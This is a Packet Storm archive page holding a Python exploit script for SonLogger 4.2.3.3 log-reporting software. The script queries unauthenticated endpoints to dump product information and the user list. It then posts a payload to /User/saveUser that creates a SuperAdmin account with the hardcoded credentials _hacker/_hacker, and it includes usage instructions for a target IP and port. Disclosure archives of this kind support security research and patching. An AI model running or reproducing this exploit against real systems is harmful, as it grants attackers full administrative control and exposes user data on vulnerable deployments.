what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SonLogger 4.2.3.3 SuperAdmin Account Creation / Information Disclosure

SonLogger 4.2.3.3 SuperAdmin Account Creation / Information Disclosure
Posted Mar 15, 2021
Authored by Berkan Er

SonLogger version 4.2.3.3 suffers from SuperAdmin account creation and information disclosure vulnerabilities.

tags | exploit, vulnerability, info disclosure
SHA-256 | 56e7d17df146559c639aaff1a40016847783570bed8733186cd99df1cc81fbb9

SonLogger 4.2.3.3 SuperAdmin Account Creation / Information Disclosure

Change Mirror Download
# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
# Date: 04-02-2021
# Exploit Author: Berkan Er
# Vendor Homepage: https://www.sonlogger.com/
# Version: 4.2.3.3
# Tested on: Windows 10 Enterprise x64 Version 1803
# A remote attacker can be create an user with SuperAdmin profile

#!/usr/bin/python3

import argparse
import string
import sys
from random import random

import requests
import json

banner = '''
Sonlogger Log and Report System - v4.2.3.3
Remote SuperAdmin Account Creation Vulnerability / Information Disclosure

Berkan Er <b3rsec@protonmail.com>
@erberkan
'''

commonHeaders = {
'Content-type': 'application/json',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest'
}


def get_random_string():
res = ''.join(random.choices(string.ascii_lowercase, k=8))
print(res)
return str(res)


def getProductInfo(host, port, flag):
response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo',
data={},
headers=commonHeaders)

print("[*] Status code: ", response.status_code)
print("[*] Product Version: ", response.json()['Version'])
info_json = json.dumps(response.json(), indent=2)

response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
user_json = json.dumps(response_1.json(), indent=2)

if flag:
print("\n*** Product Infos=\n" + info_json)
print("\n*** Users=\n" + user_json)

if response.json()['Version'] == '4.2.3.3':
print("[+] It seems vulnerable !")
return True
else:
print("[!] It doesn't vulnerable !")
return False


def createSuperAdmin(host, port):
payload = '''{
'_profilename':'superadmin_profile',
'_username':'_hacker',
'_password':'_hacker',
'_fullname':'', '_email':''
}'''

response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
print("[*] STAUTS CODE:", response.status_code)
print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")

response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
json_formatted_str = json.dumps(response_1.json(), indent=2)
print("\n*** Users=\n" + json_formatted_str)


def main():
print(banner)

try:
host = sys.argv[1]
port = sys.argv[2]
action = sys.argv[3]

if action == 'TRUE':
if getProductInfo(host, port, False):
createSuperAdmin(host, port)
else:
getProductInfo(host, port, True)

print("KTHNXBYE!")

except:
print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
"Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
"Infos")
print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")


if __name__ == "__main__":
main()



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close